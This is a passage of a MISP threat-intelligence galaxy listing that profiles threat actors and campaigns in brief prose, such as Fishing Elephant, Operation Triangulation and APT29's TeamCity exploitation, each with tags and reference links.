https://securelist.com/apt-review-of-the-year/89117/

Fishing Elephant

Fishing Elephant is a threat actor that primarily targets victims in Bangladesh and Pakistan. They rely on consistent TTPs, including payload and communication patterns, while occasionally incorporating new techniques such as geo-fencing and hiding executables within certificate files. Their tool of choice is AresRAT, which they deliver through platforms like Heroku and Dropbox. Recently, they have shifted their focus to government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine, and China.

The tag is: misp-galaxy:threat-actor="Fishing Elephant"

Table 12372. Table References

Links

https://securelist.com/apt-trends-report-q1-2020/96826/

https://securelist.com/apt-trends-report-q1-2022/106351/

RevengeHotels

RevengeHotels is a targeted cybercrime campaign that has been active since 2015, primarily targeting hotels, hostels, and tourism companies. The threat actor uses remote access Trojan malware to infiltrate hotel front desks and steal credit card data from guests and travelers. The campaign has impacted hotels in multiple countries, including Brazil, Argentina, Chile, and Mexico. The threat actor employs social engineering techniques and sells credentials from infected systems to other cybercriminals for remote access.

The tag is: misp-galaxy:threat-actor="RevengeHotels"

Table 12373. Table References

Links

https://securelist.com/revengehotels/95229/

GhostEmperor

GhostEmperor is a Chinese-speaking threat actor that targets government entities and telecom companies in Southeast Asia. They employ a Windows kernel-mode rootkit called Demodex to gain remote control over their targeted servers. The actor demonstrates a high level of sophistication and uses various anti-forensic and anti-analysis techniques to evade detection. They have been active for a significant period of time and continue to pose a threat to their targets.

The tag is: misp-galaxy:threat-actor="GhostEmperor"

Table 12374. Table References

Links

https://www.mandiant.com/resources/blog/unc4841-post-barracuda-zero-day-remediation

https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/

Operation Triangulation

Operation Triangulation is an ongoing APT campaign targeting iOS devices with zero-click iMessage exploits. The threat actor behind the campaign has been active since at least 2019 and continues to operate. The attack chain involves the delivery of a malicious iMessage attachment that launches a series of exploits, ultimately leading to the deployment of the TriangleDB implant. Kaspersky researchers have discovered and reported multiple vulnerabilities used in the campaign, with patches released by Apple.

The tag is: misp-galaxy:threat-actor="Operation Triangulation"

Table 12375. Table References

Links

https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/

https://securelist.com/operation-triangulation-catching-wild-triangle/110916/

https://securelist.com/triangulation-validators-modules/110847/

https://securelist.com/operation-triangulation/109842/

Operation Ghoul

Operation Ghoul is a profit-driven threat actor that targeted over 130 organizations in 30 countries, primarily in the industrial and engineering sectors. They employed high-quality social engineering techniques, such as spear-phishing emails disguised as payment advice from a UAE bank, to distribute malware. The group’s main motivation is financial gain through the sale of stolen intellectual property and business intelligence, as well as attacks on banking accounts. Their attacks were effective, particularly against companies that were unprepared to detect them.

The tag is: misp-galaxy:threat-actor="Operation Ghoul"

Table 12376. Table References

Links

https://securelist.com/kaspersky-security-bulletin-2016-executive-summary/76858/

https://securelist.com/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/75718/

CardinalLizard

CardinalLizard, a cyber threat actor linked to China, has targeted entities in Asia since 2018. Their methods include spear-phishing, custom malware with anti-detection features, and potentially shared infrastructure with other actors.

The tag is: misp-galaxy:threat-actor="CardinalLizard"

Table 12377. Table References

Links

https://securelist.com/apt-review-of-the-year/89117/

Ferocious Kitten

Ferocious Kitten is an APT group that has been active against Persian-speaking individuals since 2015 and appears to be based in Iran. Although it has been active over a large timespan, the group has mostly operated under the radar until a lure document was uploaded to VirusTotal and was brought to public knowledge by researchers on Twitter. Subsequently, one of its implants was analyzed by a Chinese intelligence firm. Kaspersky then expanded some of the findings on the group and provided insights on additional variants. The malware dropped from the aforementioned document is dubbed MarkiRAT and is used to record keystrokes and clipboard content, provide file download and upload capabilities, and execute arbitrary commands on the victim’s machine. Kaspersky were able to trace the implant back to at least 2015, along with variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method. Interestingly, some of the TTPs used by this threat actor are reminiscent of other groups operating in the domain of dissident surveillance. For example, it used the same C2 domains across its implants for years, which was witnessed in the activity of Domestic Kitten. In the same vein, the Telegram execution hijacking technique observed in this campaign by Ferocious Kitten was also observed being used by Rampant Kitten, as covered by Check Point.

The tag is: misp-galaxy:threat-actor="Ferocious Kitten"

Table 12378. Table References

Links

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Operation Red Signature

The threat actors compromised the update server of a remote support solutions provider to deliver a remote access tool called 9002 RAT to their targets of interest through the update process. They carried this out by first stealing the company’s certificate then using it to sign the malware. They also configured the update server to only deliver malicious files if the client is located in the range of IP addresses of their target organisations.

The tag is: misp-galaxy:threat-actor="Operation Red Signature"

Table 12379. Table References

Links

https://decoded.avast.io/threatintel/avast-finds-backdoor-on-us-government-commission-network/?utm_source=rss&utm_medium=rss&utm_campaign=avast-finds-backdoor-on-us-government-commission-network

https://www.trendmicro.com/en_my/research/18/h/supply-chain-attack-operation-red-signature-targets-south-korean-organizations.html

Earth Yako

Earth Yako is a threat actor that has been actively targeting researchers in academic organizations and think tanks in Japan. They use spearphishing emails with malicious attachments to gain initial access to their targets' systems. Earth Yako’s objectives and patterns suggest a possible connection to a Chinese APT group, but conclusive proof of their nationality is lacking. They have been observed using various malware delivery methods and techniques, such as the use of Winword.exe for DLL Hijacking.

The tag is: misp-galaxy:threat-actor="Earth Yako"

Earth Yako is also known as:

  • Operation RestyLink

  • Enelink

Table 12380. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html

Urpage

What sets Urpage attacks apart is their targeting of InPage, a word processor for the Urdu and Arabic languages. However, its Delphi backdoor component, which it shares with Confucius and Patchwork, and its apparent use of Bahamut-like malware are what make it more intriguing, as they connect Urpage to these other known threats. Trend Micro covered the Delphi component in the context of the Confucius and Patchwork connection, mentioning Urpage as a third, unnamed threat actor connected to the two.

The tag is: misp-galaxy:threat-actor="Urpage"

Table 12381. Table References

Links

https://www.trendmicro.com/en_us/research/18/h/the-urpage-connection-to-bahamut-confucius-and-patchwork.html

Operation Emmental

Operation Emmental, also known as the Retefe gang, is a threat actor group that has been active since at least 2012. They primarily target customers of banks in countries such as Austria, Sweden, Switzerland, and Japan. The group has developed sophisticated malware, including a Mac alternative called Dok, to bypass two-factor authentication and hijack network traffic. They have also been observed using phishing emails to spread their malware. The group is believed to be Russian-speaking and has continuously improved their malicious codes over the years.

The tag is: misp-galaxy:threat-actor="Operation Emmental"

Operation Emmental is also known as:

  • Retefe Gang

  • Retefe Group

Table 12382. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/osx_dok-mac-malware-emmental-hijacks-user-network-traffic/

TA2725

TA2725 is a threat actor that has been tracked since March 2022. They primarily target organizations in Brazil and Mexico using Brazilian banking malware and phishing techniques. Recently, they have expanded their operations to also target victims in Spain and Mexico simultaneously. TA2725 typically uses GoDaddy virtual hosting for their URL redirector and hosts malicious files on legitimate cloud hosting providers like Amazon AWS, Google Cloud, or Microsoft Azure. They have been known to spoof legitimate companies, such as ÉSECÈ Group, to deceive their victims.

The tag is: misp-galaxy:threat-actor="TA2725"

Table 12383. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/copacabana-barcelona-cross-continental-threat-brazilian-banking-malware

Blackatom

Recent campaigns suggest Hamas-linked actors may be advancing their TTPs to include intricate social engineering lures specially crafted to appeal to a niche group of high value targets. In September 2023, a Palestine-based group likely linked to Hamas targeted Israeli software engineers using an elaborate social engineering ruse that ultimately installed malware and stole cookies. The attackers, which Google’s Threat Analysis Group (TAG) tracks as BLACKATOM, posed as employees of legitimate companies and reached out via LinkedIn to invite targets to apply for software development freelance opportunities. Targets included software engineers in the Israeli military, as well as Israel’s aerospace and defense industry.

The tag is: misp-galaxy:threat-actor="Blackatom"

Table 12384. Table References

Links

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

BANISHED KITTEN

BANISHED KITTEN is an Iranian state-nexus adversary active since at least 2008. While the adversary’s most prominent activity is the July and September 2022 disruptive attacks targeting Albanian government infrastructure and the use of the HomelandJustice persona to leak stolen data, BANISHED KITTEN has likely targeted dissidents using the AllinOneNeo malware family.

The tag is: misp-galaxy:threat-actor="BANISHED KITTEN"

BANISHED KITTEN is also known as:

  • DUNE

  • Storm-0842

Table 12385. Table References

Links

https://www.crowdstrike.com/adversaries/banished-kitten/

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

ProCC

ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC’s malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.

The tag is: misp-galaxy:threat-actor="ProCC"

Table 12386. Table References

Links

https://securelist.com/revengehotels/95229/

ResumeLooters

Since the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites. The group employs a variety of simple techniques, including SQL injection and XSS. The threat actor attempted to insert XSS scripts into all available forms, aiming to execute it on the administrators’ device to obtain admin credentials. While the group was able to execute the XSS script on some visitors’ devices with administrative access, allowing ResumeLooters to steal the HTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin credential thefts.

The tag is: misp-galaxy:threat-actor="ResumeLooters"

Table 12387. Table References

Links

https://www.group-ib.com/blog/resumelooters/

ShadowSyndicate

ShadowSyndicate is a threat actor associated with various ransomware groups, using a consistent Secure Shell fingerprint across multiple servers. They have been linked to ransomware families such as Quantum, Nokoyawa, and ALPHV. ShadowSyndicate’s infrastructure overlaps with that of Cl0p, suggesting potential connections between the two groups. Their activities indicate they may be a Ransomware-as-a-Service affiliate.

The tag is: misp-galaxy:threat-actor="ShadowSyndicate"

Table 12388. Table References

Links

https://www.group-ib.com/blog/shadowsyndicate-raas/

LabHost

LabHost is a threat actor group targeting Canadian Banks with Phishing-as-a-Service attacks. They have been observed using tools like LabRat and LabSend for real-time campaign management and SMS lures. LabHost’s phishing campaigns have similarities to Frappo campaigns, but they operate separately and offer different subscription packages.

The tag is: misp-galaxy:threat-actor="LabHost"

Table 12389. Table References

Links

https://www.phishlabs.com/blog/phishing-service-profile-labhost-threat-actor-group

Cyber.Anarchy.Squad

Cyber Anarchy Squad is a pro-Ukrainian hacktivist group known for targeting Russian companies and infrastructure. They have carried out cyberattacks on Russian telecom providers, financial institutions, and government agencies, causing disruptions to services and leaking stolen data. The group has used techniques such as wiping network equipment, defacing websites, and leaking sensitive documents to support their cause. Cyber Anarchy Squad has been active for at least four years, evolving from cyber-bullying to more sophisticated hacking activities.

The tag is: misp-galaxy:threat-actor="Cyber.Anarchy.Squad"

Cyber.Anarchy.Squad is also known as:

  • Cyber Anarchy Squad

Table 12390. Table References

Links

https://srslyriskybiz.substack.com/p/russias-extradition-wars-are-not

https://therecord.media/proukraine-hackers-claim-to-take-down-russian-isp

GoldFactory

GoldFactory is a threat actor group attributed to developing sophisticated mobile banking malware targeting victims primarily in the Asia-Pacific region, specifically Vietnam and Thailand. They utilize social engineering to deliver malware to victims' devices and have close connections to the Gigabud malware family. GoldFactory’s Trojans, such as GoldPickaxe and GoldDigger, employ tactics like smishing, phishing, and fake login screens to compromise victims' phones and steal sensitive information. Their evolving malware suite demonstrates a high level of operational maturity and ingenuity, requiring a proactive and multi-faceted cybersecurity approach to detect and mitigate their threats.

The tag is: misp-galaxy:threat-actor="GoldFactory"

Table 12391. Table References

Links

https://www.group-ib.com/blog/goldfactory-ios-trojan/

SPIKEDWINE

SPIKEDWINE is a threat actor targeting European officials with a new backdoor called WINELOADER. They use a bait PDF document posing as an invitation letter from the Ambassador of India to lure diplomats. The attack is characterized by advanced tactics, techniques, and procedures in the malware and command and control infrastructure. The motivation behind the attacks seems to be exploiting the geopolitical relations between India and European nations.

The tag is: misp-galaxy:threat-actor="SPIKEDWINE"

Table 12392. Table References

Links

https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader

UAC-0184

UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.

The tag is: misp-galaxy:threat-actor="UAC-0184"

Table 12393. Table References

Links

https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga

https://cert.gov.ua/article/6276988

UNC1549

UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.

The tag is: misp-galaxy:threat-actor="UNC1549"

Table 12394. Table References

Links

https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east

Mogilevich

Mogilevich is a ransomware group known for claiming to breach organizations like Epic Games and Ireland’s Department of Foreign Affairs, offering stolen data for sale without providing proof of the attacks. They operate as an extortion group, targeting high-profile victims and demanding payment for the data they claim to have stolen. Despite their claims, security researchers have noted that Mogilevich’s tactics and website design suggest they may not be a sophisticated threat actor.

The tag is: misp-galaxy:threat-actor="Mogilevich"

Table 12395. Table References

Links

https://therecord.media/ireland-dfa-no-evidence-of-cybersecurity-breach

https://www.bleepingcomputer.com/news/security/epic-games-zero-evidence-we-were-hacked-by-mogilevich-gang/

R00tK1T

R00TK1T is a hacking group known for sophisticated cyber attacks targeting governmental agencies in Malaysia, including data exfiltration from the National Population and Family Development Board. The group has publicized their successful attacks on social media, showcasing stolen data. R00TK1T has also targeted Malaysian telecom providers, defacing portals and potentially breaching user data.

The tag is: misp-galaxy:threat-actor="R00tK1T"

Table 12396. Table References

Links

https://logrhythm.com/blog/how-government-agencies-can-defend-against-exfiltration-tactics/

https://cyble.com/blog/cyble-chronicles-february-1-latest-findings-recommendations-for-the-cybersecurity-community/

Tidal Campaigns

Tidal Campaigns Cluster.

Tidal Campaigns is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Tidal Cyber

2015 Ukraine Electric Power Attack

[2015 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/96e367d0-a744-5b63-85ec-595f505248a3) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) (specifically BlackEnergy3) and [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) to target and disrupt transmission and distribution substations within the Ukrainian power grid. This campaign was the first major public attack conducted against the Ukrainian power grid by Sandworm Team.

The tag is: misp-galaxy:campaigns="2015 Ukraine Electric Power Attack"

2016 Ukraine Electric Power Attack

[2016 Ukraine Electric Power Attack](https://app.tidalcyber.com/campaigns/06197e03-e1c1-56af-ba98-5071f98f91f1) was a [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) campaign during which they used [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666).<sup>[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)]</sup><sup>[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]</sup>

The tag is: misp-galaxy:campaigns="2016 Ukraine Electric Power Attack"

2023 Increased Truebot Activity

In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new variants of the Truebot botnet malware infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 in the IT system auditing application Netwrix Auditor to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections, FlawedGrace and Cobalt Strike for various post-exploitation activities, and Teleport, a custom tool for data exfiltration.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

The Advisory did not provide specific impacted victim sectors. The Advisory referred to activity taking place “in recent months” prior to July 2023 but did not provide an estimated date when the summarized activity began. A public threat report referenced in the Advisory reported an observed increase in Truebot infections beginning in August 2022, including several compromises involving education sector organizations.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup><sup>[[Cisco Talos Blog December 08 2022](/references/bcf92374-48a3-480f-a679-9fd34b67bcdd)]</sup>

Related Vulnerabilities: CVE-2022-31199<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

The tag is: misp-galaxy:campaigns="2023 Increased Truebot Activity"

2023 Ivanti EPMM APT Vulnerability Exploits

In August 2023, U.S. Cybersecurity & Infrastructure Security Agency (CISA) and Norwegian National Cyber Security Centre (NCSC-NO) authorities released Cybersecurity Advisory AA23-213A, which detailed observed exploitation of two vulnerabilities, CVE-2023-35078 and CVE-2023-35081, affecting Ivanti Endpoint Manager Mobile (EPMM), a solution which provides elevated access to an organization’s mobile devices. According to the Advisory, authorities observed unspecified advanced persistent threat (APT) actors exploiting CVE-2023-35078 as a zero-day from at least April 2023 in order to gather information from unspecified organizations in Norway, and to gain initial access to a Norwegian government agency.

Ivanti released a CVE-2023-35078 patch on July 23, but then determined that CVE-2023-35081 could be chained together with the first vulnerability, a process which can enable arbitrary upload and execution of actor files, such as web shells. Ivanti released a CVE-2023-35081 patch on July 28. The Advisory provided mitigation recommendations, vulnerability and compromise identification methods, and incident response guidance, which can be found in the source report.<sup>[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]</sup>

Related Vulnerabilities: CVE-2023-35078<sup>[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]</sup>, CVE-2023-35081<sup>[[U.S. CISA CVE-2023-35078 Exploits](/references/62305b8a-76c8-49ec-82dc-6756643ccf7a)]</sup>

The tag is: misp-galaxy:campaigns="2023 Ivanti EPMM APT Vulnerability Exploits"

2023 Zoho ManageEngine APT Exploits

In September 2023, U.S. cybersecurity authorities released Cybersecurity Advisory AA23-250A, which detailed multiple intrusions in early 2023 involving an aeronautical sector organization and attributed to multiple unspecified “nation-state advanced persistent threat (APT) actors”. As early as January, one set of actors exploited CVE-2022-47966, a vulnerability in the Zoho ManageEngine ServiceDesk Plus IT service management application that allows remote code execution, to access the organization’s public-facing web servers. A separate set of actors was also observed exploiting CVE-2022-42475, a vulnerability in Fortinet, Inc.’s FortiOS SSL-VPN that also allows remote code execution, to gain access to the organization’s firewall devices.

After gaining access, the actors downloaded malware, performed network discovery, collected administrator credentials, and moved laterally, but according to the advisory, unclear data storage records inhibited insight into whether any proprietary information was accessed, altered, or exfiltrated. A common behavior among both sets of actors was log deletion from critical servers and the use of disabled, legitimate administrator credentials, which in one case belonged to a previously employed contractor (the organization confirmed the credentials were disabled before the observed threat activity).<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

In addition to behavioral observations and indicators of compromise, the Advisory provided detection and mitigation guidance, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a).

Related Vulnerabilities: CVE-2022-47966, CVE-2022-42475, CVE-2021-44228<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:campaigns="2023 Zoho ManageEngine APT Exploits"

APT28 Cisco Router Exploits

In April 2023, U.S. and UK cybersecurity authorities released joint Cybersecurity Advisory AA23-108, which detailed a campaign by Russia-backed APT28 to compromise vulnerable routers running Cisco Internetworking Operating System (IOS). Actors collected device information and conducted further network reconnaissance on victims “worldwide”, including U.S. government institutions, 250 Ukrainian entities, and “a small number” of victims elsewhere in Europe. Adversary activity occurred over an unspecified timeframe in 2021.

Actors exploited CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017, and used default authentication strings to gain initial access to devices and subsequently gather router information, such as router interface details. In some cases, authorities observed actors deploying Jaguar Tooth, a malicious software bundle consisting of a series of payloads and patches. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated, backdoor access to victim systems.<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

In addition to behavioral observations, the Advisory also provided mitigation recommendations and indicators of compromise, which can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108).

Related Vulnerabilities: CVE-2017-6742<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

The tag is: misp-galaxy:campaigns="APT28 Cisco Router Exploits"

APT28 Router Compromise Attacks

U.S. authorities and various international partners released joint cybersecurity advisory AA20-150A, which detailed a series of attacks linked to APT28 that leveraged compromised Ubiquiti EdgeRouters to facilitate the attacks. Actors used the network of compromised routers for a range of malicious activities, including harvesting credentials, proxying network traffic, and hosting fake landing pages and post-exploitation tools. Attacks targeted organizations in a wide range of sectors around the world.<sup>[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)]</sup> According to a separate U.S. Justice Department announcement, the botnet involved in these attacks differed from previous APT28-linked cases, since nation-state actors accessed routers that had been initially compromised by a separate, unspecified cybercriminal group.<sup>[[U.S. Justice Department GRU Botnet February 2024](/references/26a554dc-39c0-4638-902d-7e84fe01b961)]</sup>

The tag is: misp-galaxy:campaigns="APT28 Router Compromise Attacks"

APT29 Cloud TTP Evolution

UK cybersecurity authorities and international partners published Cybersecurity Advisory AA24-057A (February 2024), which detailed recent tactics, techniques, and procedures (TTPs) used by Russian state-backed adversary group APT29 to target cloud environments. The advisory indicated that as more government agencies and enterprises move elements of their operations to cloud infrastructure, APT29 actors have especially adapted their TTPs for gaining initial access into these cloud environments.<sup>[[U.S. CISA APT29 Cloud Access](/references/e9e08eca-1e01-4ff0-a8ef-49ecf66aaf3d)]</sup>

The tag is: misp-galaxy:campaigns="APT29 Cloud TTP Evolution"

APT29 TeamCity Exploits

In December 2023, U.S. cybersecurity authorities and international partners released Cybersecurity Advisory AA23-347A, which detailed large-scale observed exploitation of CVE-2023-42793 since September 2023 by cyber threat actors associated with Russia’s Foreign Intelligence Service (SVR). According to the advisory, these actors are also known as APT29, the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard.

CVE-2023-42793 is an authentication bypass vulnerability in the JetBrains TeamCity software development program. After exploiting the vulnerability to gain access into victim networks, SVR actors were then observed escalating privileges, moving laterally, and deploying additional backdoors in an apparent effort to maintain long-term persistent access to victim environments. The advisory noted how SVR actors used access gained during the 2020 compromise of SolarWinds, another software company, to conduct supply chain operations affecting SolarWinds customers, but it also noted that such activity has not been observed in this case to date.

JetBrains released a patch for CVE-2023-42793 in September 2023. The advisory indicated that the compromises observed to date appear to be opportunistic, impacting unpatched, internet-accessible TeamCity servers. “A few dozen” compromised entities have been identified so far (companies in disparate sectors in the United States, Europe, Asia, and Australia), but authorities assess that this tally does not represent the full number of compromised victims. Indicators of compromise, mitigation guidance, and detection resources – including Sigma and YARA rules – can be found in the source report.<sup>[[U.S. CISA SVR TeamCity Exploits December 2023](/references/5f66f864-58c2-4b41-8011-61f954e04b7e)]</sup>

The tag is: misp-galaxy:campaigns="APT29 TeamCity Exploits"

C0010

[C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researchers assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://app.tidalcyber.com/campaigns/a1e33caf-6eb0-442f-b97a-f6042f21df48) began by at least late 2020, and was still ongoing as of mid-2022.<sup>[[Mandiant UNC3890 Aug 2022](https://app.tidalcyber.com/references/7b3fda0b-d327-4f02-bebe-2b8974f9959d)]</sup>

The tag is: misp-galaxy:campaigns="C0010"

C0011

[C0011](https://app.tidalcyber.com/campaigns/4c7386a7-9741-4ae4-8ad9-def03ed77e29) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://app.tidalcyber.com/groups/441b91d1-256a-4763-bac6-8f1c76764a25)'s historic targeting of Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.<sup>[[Cisco Talos Transparent Tribe Education Campaign July 2022](https://app.tidalcyber.com/references/acb10fb6-608f-44d3-9faf-7e577b0e2786)]</sup>

The tag is: misp-galaxy:campaigns="C0011"

C0015

[C0015](https://app.tidalcyber.com/campaigns/85bbff82-ba0c-4193-a3b5-985afd5690c5) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac), [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6), and [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5), along with other tools, over a 5-day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) ransomware playbook based on the observed pattern of activity and operator errors.<sup>[[DFIR Conti Bazar Nov 2021](https://app.tidalcyber.com/references/a6f1a15d-448b-41d4-81f0-ee445cba83bd)]</sup>

The tag is: misp-galaxy:campaigns="C0015"

C0017

[C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100) was an [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet-facing web applications. During [C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100), [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://app.tidalcyber.com/campaigns/a56d7700-c015-52ca-9c52-fed4d122c100) are unknown; however, [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) was observed exfiltrating Personally Identifiable Information (PII).<sup>[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]</sup>

The tag is: misp-galaxy:campaigns="C0017"

C0018

[C0018](https://app.tidalcyber.com/campaigns/0452e367-aaa4-5a18-8028-a7ee136fe646) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0).<sup>[[Costa AvosLocker May 2022](https://app.tidalcyber.com/references/a94268d8-6b7c-574b-a588-d8fd80c27fd3)]</sup><sup>[[Cisco Talos Avos Jun 2022](https://app.tidalcyber.com/references/1170fdc2-6d8e-5b60-bf9e-ca915790e534)]</sup>

The tag is: misp-galaxy:campaigns="C0018"

C0021

[C0021](https://app.tidalcyber.com/campaigns/86bed8da-4cab-55fe-a2d0-9214db1a09cf) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://app.tidalcyber.com/campaigns/86bed8da-4cab-55fe-a2d0-9214db1a09cf)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) activity.<sup>[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)]</sup><sup>[[FireEye APT29 Nov 2018](https://app.tidalcyber.com/references/30e769e0-4552-429b-b16e-27830d42edea)]</sup>

The tag is: misp-galaxy:campaigns="C0021"

C0026

